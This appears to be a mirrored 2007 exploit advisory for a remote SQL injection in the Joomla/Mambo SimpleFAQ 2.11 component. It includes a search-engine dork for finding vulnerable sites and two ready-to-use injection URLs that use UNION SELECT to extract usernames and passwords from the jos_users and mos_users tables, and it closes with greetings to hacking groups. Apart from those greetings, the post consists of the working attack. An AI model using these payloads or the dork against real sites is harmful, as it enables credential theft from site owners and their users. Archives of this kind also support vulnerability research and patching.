Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17867
HistoryAug 22, 2007 - 12:00 a.m.

Joomla Component SimpleFAQ V2.11 - Remote SQL Injection

2007-08-2200:00:00
vulners.com
53

########################################################################

Joomla Component SimpleFAQ V2.11 - Remote SQL Injection

Vendor : http://www.parkviewconsultants.com/

Found By : k1tk4t - k1tk4t[4t]newhack.org

Location : Indonesia – #newhack[dot]org @irc.dal.net

Dork : inurl:"index.php?option=com_simplefaq"

########################################################################

joomla exploit
http://localhost/mambo/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*

mambo exploit;
http://localhost/mambo/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/mos_users/*

########################################################################
Thanks;
str0ke
xoron,y3dips,mathdule,iFX,x-ace,nyubi,selikoer
dan semua temen2 komunitas security&hacking

-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX

all member newhack[dot]org

all member echo.or.id

all member www.yogyafree.net

all member www.sekuritionline.net

all member www.kecoak-elektronik.net

semua komunitas hacker&security Indonesia